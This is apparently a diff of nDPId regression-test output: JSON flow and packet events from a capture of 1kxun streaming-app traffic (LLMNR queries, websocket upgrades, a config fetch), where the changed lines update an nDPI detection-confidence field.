00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1420,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1470104432630,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"thread_ts_msec":1470104432630,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACMRAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQAD5GQU6wAjSCvt1AAAAAEAAAAAAAAJV0FOR1MtTFRXAAD\/AAE="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1420,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104432630,"flow_last_seen":1470104432630,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104432630,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":58468,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1420,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104432630,"flow_last_seen":1470104432630,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104432630,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":58468,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1421,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104432630,"flow_last_seen":1470104432630,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104432630,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":65496,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1421,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1470104432630,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104432630,"pkt":"AQBeAAD8PKn0WgOECABFAAA3IDQAAAER8\/HAqAPs4AAA\/P\/YFOsAI0Pg7dQAAAABAAAAAAAACVdBTkdTLUxUVwAA\/wAB"} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1421,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104432630,"flow_last_seen":1470104432630,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104432630,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":65496,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1421,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104432630,"flow_last_seen":1470104432630,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104432630,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":65496,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1422,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":2,"flow_last_seen":1470104432728,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"thread_ts_msec":1470104432728,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACMRAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQAD5GQU6wAjSCvt1AAAAAEAAAAAAAAJV0FOR1MtTFRXAAD\/AAE="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1423,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":2,"flow_last_seen":1470104432728,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104432728,"pkt":"AQBeAAD8PKn0WgOECABFAAA3IDUAAAER8\/DAqAPs4AAA\/P\/YFOsAI0Pg7dQAAAABAAAAAAAACVdBTkdTLUxUVwAA\/wAB"} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1436,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1470104433649,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1470104433649,"pkt":"\/\/\/\/\/\/\/\/AAK2Qbs6CABFAABEAABAAEARd0fAqAK6\/\/\/\/\/4AAB5sAMBr8aWNSVlNvVTlBQUJYWldKRFlXeHNBSFZ0Ukc5c2IzSlRhWFJCYldVQQ=="} 00568{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1440,"source":"1kxun.pcap","alias":"nDPId-test","packets-captured":1440,"packets-processed":1439,"total-skipped-flows":0,"total-l4-payload-len":552863,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":109,"total-detection-updates":11,"total-updates":0,"current-active-flows":129,"total-active-flows":129,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":546,"global_ts_msec":1654385119050} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1440,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385119050,"flow_last_seen":1654385119050,"flow_idle_time":7580000,"flow_min_l4_payload_len":538,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":538,"flow_avg_l4_payload_len":538,"midstream":1,"thread_ts_msec":1654385119050,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.93.92","src_port":60962,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01191{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1440,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1654385119050,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":604,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":604,"pkt_l4_len":570,"thread_ts_msec":1654385119050,"pkt":"tKXvZygQnLbQ0+MzCABFAAJOAZpAAEAGaiXAqAJ+rGhdXO4iBNJ6yTZonxdjWoAYAfbPKwAAAQEICmbWNa+8oaeIR0VUIC8\/X2JyYW5kPUdvb2dsZSZfbW9kZWw9c2RrX2dwaG9uZV94ODYmX292PUFuZHJvaWQxMSZfY3B1PWk2ODYmX3Jlc29sdXRpb249MTA4MCUyQzE3OTQmX3BhY2thZ2U9Y29tLnNjZW5ld2F5LmthbmthbiZfdj0yLjguMi4xJl9jaGFubmVsPTFreHVuJl9jYXJyaWVyPTMxMDI2MCZfYW5kcm9pZF9pZD1iOWUyODc3NjM1NGQyNTllJl9uZXR3b3JrPXdpZmkmX2FpZD01YWM2YTBmZi04ZDE4LTQ3YmMtYTkwMi0yODEyY2YwYzI1MWUmJl9jb3VudHJ5PVVTJl9sb2NhbGU9ZW4mXz0xNjU0Mzg1MTE3IEhUVFAvMS4xDQphdXRob3JpemF0aW9uX2NvZGU6IDg5QTBGQ0UzOTE2OEM5RTIxOTM1N0IzRjJEMzA4RDIwDQpVcGdyYWRlOiB3ZWJzb2NrZXQNCkNvbm5lY3Rpb246IFVwZ3JhZGUNClNlYy1XZWJTb2NrZXQtS2V5OiBMVFJDT1VPdEIwdHRrSnJIdUhaRHRnPT0NClNlYy1XZWJTb2NrZXQtVmVyc2lvbjogMTMNCkhvc3Q6IHdzLjFreHVuLm1vYmk6MTIzNA0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBva2h0dHAvMy4xMC4wDQoNCg=="} -01180{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1440,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385119050,"flow_last_seen":1654385119050,"flow_idle_time":7580000,"flow_min_l4_payload_len":538,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":538,"flow_avg_l4_payload_len":538,"midstream":1,"thread_ts_msec":1654385119050,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.93.92","src_port":60962,"dst_port":1234,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"ws.1kxun.mobi","url":"ws.1kxun.mobi:1234\/?_brand=Google&_model=sdk_gphone_x86&_ov=Android11&_cpu=i686&_resolution=1080%2C1794&_package=com.sceneway.kankan&_v=2.8.2.1&_channel=1kxun&_carrier=310260&_android_id=b9e28776354d259e&_network=wifi&_aid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&&_country=US&_locale=en&_=1654385117","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} +01180{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1440,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385119050,"flow_last_seen":1654385119050,"flow_idle_time":7580000,"flow_min_l4_payload_len":538,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":538,"flow_avg_l4_payload_len":538,"midstream":1,"thread_ts_msec":1654385119050,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.93.92","src_port":60962,"dst_port":1234,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"ws.1kxun.mobi","url":"ws.1kxun.mobi:1234\/?_brand=Google&_model=sdk_gphone_x86&_ov=Android11&_cpu=i686&_resolution=1080%2C1794&_package=com.sceneway.kankan&_v=2.8.2.1&_channel=1kxun&_carrier=310260&_android_id=b9e28776354d259e&_network=wifi&_aid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&&_country=US&_locale=en&_=1654385117","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 00722{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1441,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":2,"flow_last_seen":1654385119358,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":255,"pkt_l4_len":221,"thread_ts_msec":1654385119358,"pkt":"nLbQ0+MztKXvZygQCABFAADxLm1AADYGSK+saF1cwKgCfgTS7iKfF2Naesk4goAYAfnUtgAAAQEICryhqPBm1jWvSFRUUC8xLjEgMTAxIFN3aXRjaGluZyBQcm90b2NvbHMNClVwZ3JhZGU6IHdlYnNvY2tldA0KQ29ubmVjdGlvbjogVXBncmFkZQ0KU2VjLVdlYlNvY2tldC1BY2NlcHQ6IFMxR1lPY3ZzV3BRa0lpb3FkaEFpMENndkJhdz0NClNlYy1XZWJTb2NrZXQtVmVyc2lvbjogMTMNClNlcnZlcjogc3dvb2xlLXdlYnNvY2tldC1zZXJ2ZXINCg0K"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1442,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385119973,"flow_last_seen":1654385119973,"flow_idle_time":7580000,"flow_min_l4_payload_len":538,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":538,"flow_avg_l4_payload_len":538,"midstream":1,"thread_ts_msec":1654385119973,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.93.92","src_port":60972,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01191{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1442,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1654385119973,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":604,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":604,"pkt_l4_len":570,"thread_ts_msec":1654385119973,"pkt":"tKXvZygQnLbQ0+MzCABFAAJOd7pAAEAG9ATAqAJ+rGhdXO4sBNI37f0u8ShzhYAYAfbPKwAAAQEICmbWOUq8oasmR0VUIC8\/X2JyYW5kPUdvb2dsZSZfbW9kZWw9c2RrX2dwaG9uZV94ODYmX292PUFuZHJvaWQxMSZfY3B1PWk2ODYmX3Jlc29sdXRpb249MTA4MCUyQzE3OTQmX3BhY2thZ2U9Y29tLnNjZW5ld2F5LmthbmthbiZfdj0yLjguMi4xJl9jaGFubmVsPTFreHVuJl9jYXJyaWVyPTMxMDI2MCZfYW5kcm9pZF9pZD1iOWUyODc3NjM1NGQyNTllJl9uZXR3b3JrPXdpZmkmX2FpZD01YWM2YTBmZi04ZDE4LTQ3YmMtYTkwMi0yODEyY2YwYzI1MWUmJl9jb3VudHJ5PVVTJl9sb2NhbGU9ZW4mXz0xNjU0Mzg1MTE4IEhUVFAvMS4xDQphdXRob3JpemF0aW9uX2NvZGU6IDg5QTBGQ0UzOTE2OEM5RTIxOTM1N0IzRjJEMzA4RDIwDQpVcGdyYWRlOiB3ZWJzb2NrZXQNCkNvbm5lY3Rpb246IFVwZ3JhZGUNClNlYy1XZWJTb2NrZXQtS2V5OiBhVXMza2VlelV1aUhuMFlucmFuaTl3PT0NClNlYy1XZWJTb2NrZXQtVmVyc2lvbjogMTMNCkhvc3Q6IHdzLjFreHVuLm1vYmk6MTIzNA0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBva2h0dHAvMy4xMC4wDQoNCg=="} -01180{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1442,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385119973,"flow_last_seen":1654385119973,"flow_idle_time":7580000,"flow_min_l4_payload_len":538,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":538,"flow_avg_l4_payload_len":538,"midstream":1,"thread_ts_msec":1654385119973,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.93.92","src_port":60972,"dst_port":1234,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"ws.1kxun.mobi","url":"ws.1kxun.mobi:1234\/?_brand=Google&_model=sdk_gphone_x86&_ov=Android11&_cpu=i686&_resolution=1080%2C1794&_package=com.sceneway.kankan&_v=2.8.2.1&_channel=1kxun&_carrier=310260&_android_id=b9e28776354d259e&_network=wifi&_aid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&&_country=US&_locale=en&_=1654385118","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} +01180{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1442,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385119973,"flow_last_seen":1654385119973,"flow_idle_time":7580000,"flow_min_l4_payload_len":538,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":538,"flow_avg_l4_payload_len":538,"midstream":1,"thread_ts_msec":1654385119973,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.93.92","src_port":60972,"dst_port":1234,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"ws.1kxun.mobi","url":"ws.1kxun.mobi:1234\/?_brand=Google&_model=sdk_gphone_x86&_ov=Android11&_cpu=i686&_resolution=1080%2C1794&_package=com.sceneway.kankan&_v=2.8.2.1&_channel=1kxun&_carrier=310260&_android_id=b9e28776354d259e&_network=wifi&_aid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&&_country=US&_locale=en&_=1654385118","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 00723{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1443,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":2,"flow_last_seen":1654385120216,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":255,"pkt_l4_len":221,"thread_ts_msec":1654385120216,"pkt":"nLbQ0+MztKXvZygQCABFAADxBX1AADYGcZ+saF1cwKgCfgTS7izxKHOFN+3\/SIAYAflO7QAAAQEICryhrIhm1jlKSFRUUC8xLjEgMTAxIFN3aXRjaGluZyBQcm90b2NvbHMNClVwZ3JhZGU6IHdlYnNvY2tldA0KQ29ubmVjdGlvbjogVXBncmFkZQ0KU2VjLVdlYlNvY2tldC1BY2NlcHQ6IEtVa3drYTlicGVRVFVqNFdjZnNKekJpSXRUST0NClNlYy1XZWJTb2NrZXQtVmVyc2lvbjogMTMNClNlcnZlcjogc3dvb2xlLXdlYnNvY2tldC1zZXJ2ZXINCg0K"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1444,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385120896,"flow_last_seen":1654385120896,"flow_idle_time":7580000,"flow_min_l4_payload_len":538,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":538,"flow_avg_l4_payload_len":538,"midstream":1,"thread_ts_msec":1654385120896,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.93.92","src_port":60984,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01191{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1444,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1654385120896,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":604,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":604,"pkt_l4_len":570,"thread_ts_msec":1654385120896,"pkt":"tKXvZygQnLbQ0+MzCABFAAJOiDpAAEAG44TAqAJ+rGhdXO44BNLYsfEUYaCrMIAYAfbPKwAAAQEICmbWPOa8oa7yR0VUIC8\/X2JyYW5kPUdvb2dsZSZfbW9kZWw9c2RrX2dwaG9uZV94ODYmX292PUFuZHJvaWQxMSZfY3B1PWk2ODYmX3Jlc29sdXRpb249MTA4MCUyQzE3OTQmX3BhY2thZ2U9Y29tLnNjZW5ld2F5LmthbmthbiZfdj0yLjguMi4xJl9jaGFubmVsPTFreHVuJl9jYXJyaWVyPTMxMDI2MCZfYW5kcm9pZF9pZD1iOWUyODc3NjM1NGQyNTllJl9uZXR3b3JrPXdpZmkmX2FpZD01YWM2YTBmZi04ZDE4LTQ3YmMtYTkwMi0yODEyY2YwYzI1MWUmJl9jb3VudHJ5PVVTJl9sb2NhbGU9ZW4mXz0xNjU0Mzg1MTE5IEhUVFAvMS4xDQphdXRob3JpemF0aW9uX2NvZGU6IDg5QTBGQ0UzOTE2OEM5RTIxOTM1N0IzRjJEMzA4RDIwDQpVcGdyYWRlOiB3ZWJzb2NrZXQNCkNvbm5lY3Rpb246IFVwZ3JhZGUNClNlYy1XZWJTb2NrZXQtS2V5OiBYdjJmVTdzaEsrRDdBNVAvMW5FQ3p3PT0NClNlYy1XZWJTb2NrZXQtVmVyc2lvbjogMTMNCkhvc3Q6IHdzLjFreHVuLm1vYmk6MTIzNA0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBva2h0dHAvMy4xMC4wDQoNCg=="} -01180{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1444,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385120896,"flow_last_seen":1654385120896,"flow_idle_time":7580000,"flow_min_l4_payload_len":538,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":538,"flow_avg_l4_payload_len":538,"midstream":1,"thread_ts_msec":1654385120896,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.93.92","src_port":60984,"dst_port":1234,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"ws.1kxun.mobi","url":"ws.1kxun.mobi:1234\/?_brand=Google&_model=sdk_gphone_x86&_ov=Android11&_cpu=i686&_resolution=1080%2C1794&_package=com.sceneway.kankan&_v=2.8.2.1&_channel=1kxun&_carrier=310260&_android_id=b9e28776354d259e&_network=wifi&_aid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&&_country=US&_locale=en&_=1654385119","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} +01180{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1444,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385120896,"flow_last_seen":1654385120896,"flow_idle_time":7580000,"flow_min_l4_payload_len":538,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":538,"flow_avg_l4_payload_len":538,"midstream":1,"thread_ts_msec":1654385120896,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.93.92","src_port":60984,"dst_port":1234,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"ws.1kxun.mobi","url":"ws.1kxun.mobi:1234\/?_brand=Google&_model=sdk_gphone_x86&_ov=Android11&_cpu=i686&_resolution=1080%2C1794&_package=com.sceneway.kankan&_v=2.8.2.1&_channel=1kxun&_carrier=310260&_android_id=b9e28776354d259e&_network=wifi&_aid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&&_country=US&_locale=en&_=1654385119","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 00722{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1445,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":2,"flow_last_seen":1654385121164,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":255,"pkt_l4_len":221,"thread_ts_msec":1654385121164,"pkt":"nLbQ0+MztKXvZygQCABFAADxUyNAADUGJPmsaF1cwKgCfgTS7jhhoKsw2LHzLoAYAfl7JgAAAQEICryhsD9m1jzmSFRUUC8xLjEgMTAxIFN3aXRjaGluZyBQcm90b2NvbHMNClVwZ3JhZGU6IHdlYnNvY2tldA0KQ29ubmVjdGlvbjogVXBncmFkZQ0KU2VjLVdlYlNvY2tldC1BY2NlcHQ6IC9xNHA4dFI0THBxMFc5OUR5YXRzaEViNXM0UT0NClNlYy1XZWJTb2NrZXQtVmVyc2lvbjogMTMNClNlcnZlcjogc3dvb2xlLXdlYnNvY2tldC1zZXJ2ZXINCg0K"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1446,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385127244,"flow_last_seen":1654385127244,"flow_idle_time":7580000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1654385127244,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47230,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00682{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1446,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1654385127244,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":223,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":223,"pkt_l4_len":189,"thread_ts_msec":1654385127244,"pkt":"tKXvZygQnLbQ0+MzCABFAADRE9lAAEAGtJXAqAJ+oXUNHbh+AFDtitlbh1f3JIAYAfZyfAAAAQEICrrF4XWXEOLhR0VUIC9hcGkuZG9tYWluLmNvbmYgSFRUUC8xLjENCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpIb3N0OiBrYW5rYW4uMWt4dW4ubW9iaQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBva2h0dHAvMy4xMC4wDQoNCg=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1446,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385127244,"flow_last_seen":1654385127244,"flow_idle_time":7580000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1654385127244,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47230,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"kankan.1kxun.mobi","url":"kankan.1kxun.mobi\/api.domain.conf","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1446,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385127244,"flow_last_seen":1654385127244,"flow_idle_time":7580000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1654385127244,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47230,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"kankan.1kxun.mobi","url":"kankan.1kxun.mobi\/api.domain.conf","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 